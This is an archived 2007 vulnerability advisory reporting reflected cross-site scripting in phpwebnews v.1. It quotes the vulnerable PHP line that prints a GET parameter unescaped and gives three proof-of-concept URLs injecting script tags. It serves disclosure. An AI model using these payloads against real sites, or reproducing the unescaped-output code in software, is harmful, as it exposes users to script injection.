Home / exploitsPDF  

phpwebnews1-xss.txt

Posted on 13 April 2007

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Research TM # Tilte: phpwebnews v.1 Multiple Cross Site Scripting Vulnerabilites # Author..................: [the_Edit0r] # HomePage................: [Www.XmorS-SEcurity.coM] # Location ...............: [Iran] # Software ...............: [phpwebnews] # Download Script ........: [http://sourceforge.net/project/showfiles.php?group_id=111998] # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ] # SP tnx .................: [www.bugtraq.ir] ------------------------------------- Code -------------------------------- <?php $m_txt=$_GET['m_txt']; print $m_txt;?> ------------------------------- proof Of Concept --------------------------- www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script> www.example.com/[path]/index.php?m_txt=<script>alert(/the_Edit0r/);</script> www.example.com/[path]/bukutamu.php?m_txt=<script>alert(/the_Edit0r/);</script> --------------------------------------------------------------------------- # Contact me : the_3dit0r[at]Yahoo[dot]coM # [XmorS-SEcurity.coM]

 

TOP